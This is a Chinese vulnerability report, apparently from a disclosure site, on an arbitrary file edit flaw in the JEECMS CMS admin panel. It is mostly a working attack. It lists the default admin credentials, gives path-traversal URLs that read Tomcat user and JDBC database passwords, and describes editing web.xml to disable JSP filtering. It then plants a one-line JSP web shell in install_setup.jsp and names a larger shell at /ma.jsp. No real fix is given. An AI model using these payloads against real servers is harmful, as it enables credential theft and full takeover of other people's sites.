JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题
详细说明：2.x后台：
login/Jeecms.do
3.x后台：
jeeadmin/jeecms/index.do
 
默认账户：admin
默认密码：password
 
获取tomcat密码：
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
 
 
获取JDBC数据库账号密码：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
 
 
 
修改web.xml取消对jsp的过滤：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../web.xml
 
 
 
修改install/install_setup.jsp：
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
 
 
 
插入Jsp一句话：
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter
 
("f"))).write(request.getParameter("t").getBytes());
%>
 
修改后的一句话目录
/install/install_setup.jsp
 
一句话连接成功后的jsp大马目录：
/ma.jsp
 
漏洞证明：
 
 
 



  
修复方案：修复：还是先修复下官方服务器吧、你懂的